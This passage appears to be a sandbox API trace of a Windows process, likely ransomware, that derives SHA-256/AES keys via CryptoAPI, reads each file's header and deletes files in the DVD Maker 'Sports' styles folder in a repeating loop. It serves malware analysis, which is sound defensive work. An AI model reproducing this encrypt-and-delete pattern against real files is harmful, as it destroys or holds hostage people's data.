(in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x120d [0146.622] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.625] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.625] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.625] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.626] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\GoldRing.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\goldring.png")) returned 0 [0146.627] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.627] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.627] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.627] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.627] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d3c [0146.627] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.631] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.631] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.631] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.632] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\highlight.png")) returned 0 [0146.633] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.633] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.633] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.633] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.633] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xba2 [0146.633] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.636] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.636] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.636] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.637] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NavigationButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\navigationbuttonsubpicture.png")) returned 0 [0146.649] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.650] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.650] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.650] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.650] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xee0 [0146.650] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.652] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.652] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.652] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.654] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\NextMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\nextmenubuttonicon.png")) returned 0 [0146.655] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.655] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.655] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.655] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.655] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xee2 [0146.655] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.657] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.657] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.657] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.659] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\ParentMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\parentmenubuttonicon.png")) returned 0 [0146.659] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.660] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.660] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.660] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.660] GetFileSize (in: hFile=0x450, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xeeb [0146.660] ReadFile (in: hFile=0x450, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.662] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.662] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.662] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.663] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png")) returned 0 [0146.763] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.763] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.763] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.763] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.763] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3d [0146.763] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.767] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.767] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.767] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.768] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha1.png")) returned 0 [0146.769] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.769] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.769] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.769] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.769] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdbe [0146.769] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.773] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0146.773] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.773] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.774] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonInset_Alpha2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttoninset_alpha2.png")) returned 0 [0146.775] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.776] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.776] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.776] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.776] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2f [0146.776] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0146.778] CryptDestroyHash (hHash=0x284d528) returned 1 [0146.778] CryptDestroyKey (hKey=0x284d668) returned 1 [0146.778] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0146.780] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png")) returned 0 [0146.780] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0146.781] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0146.781] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.781] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0146.781] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x539540 [0146.781] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0147.609] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0147.609] CryptDestroyKey (hKey=0x284d668) returned 1 [0147.609] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0147.611] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv")) returned 0 [0147.611] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0147.611] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0147.612] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.612] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0147.612] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x57bbc0 [0147.612] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0148.831] CryptDestroyHash (hHash=0x284d528) returned 1 [0148.832] CryptDestroyKey (hKey=0x284d668) returned 1 [0148.832] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0148.833] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv")) returned 0 [0148.833] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0148.834] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0148.834] CryptHashData (hHash=0x284d5a8, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.834] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0148.834] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1beae6 [0148.834] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0149.431] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0149.431] CryptDestroyKey (hKey=0x284d668) returned 1 [0149.431] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0149.433] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv")) returned 0 [0149.436] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0149.436] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0149.436] CryptHashData (hHash=0x284d528, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0149.436] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0149.436] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c0a26 [0149.437] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0149.717] CryptDestroyHash (hHash=0x284d528) returned 1 [0149.717] CryptDestroyKey (hKey=0x284d668) returned 1 [0149.717] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0149.718] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv")) returned 0 [0149.727] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0149.728] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0149.728] CryptHashData (hHash=0x284d5a8, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0149.728] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0149.728] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x184166 [0149.728] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0149.862] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0149.862] CryptDestroyKey (hKey=0x284d668) returned 1 [0149.862] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0149.864] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv")) returned 0 [0149.864] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0149.865] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0149.865] CryptHashData (hHash=0x284d528, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0149.865] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0149.865] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x189f26 [0149.865] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0149.988] CryptDestroyHash (hHash=0x284d528) returned 1 [0149.988] CryptDestroyKey (hKey=0x284d668) returned 1 [0149.988] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0150.036] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv")) returned 0 [0150.036] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0150.037] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0150.037] CryptHashData (hHash=0x284d5a8, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0150.037] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0150.037] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6680f4 [0150.037] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0151.369] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0151.369] CryptDestroyKey (hKey=0x284d668) returned 1 [0151.369] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0151.370] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv")) returned 0 [0151.409] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0151.409] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0151.409] CryptHashData (hHash=0x284d528, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0151.409] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0151.409] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x673c74 [0151.409] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0152.388] CryptDestroyHash (hHash=0x284d528) returned 1 [0152.388] CryptDestroyKey (hKey=0x284d668) returned 1 [0152.388] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0152.389] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv")) returned 0 [0152.390] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0152.390] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0152.390] CryptHashData (hHash=0x284d5a8, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0152.390] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0152.390] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ca474 [0152.390] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0152.612] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0152.612] CryptDestroyKey (hKey=0x284d668) returned 1 [0152.612] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0152.613] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv")) returned 0 [0152.614] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0152.614] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0152.614] CryptHashData (hHash=0x284d528, pbData=0x9e9668, dwDataLen=0x100, dwFlags=0x0) returned 1 [0152.614] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0152.614] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e59f4 [0152.614] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.019] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.019] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.019] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.020] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd 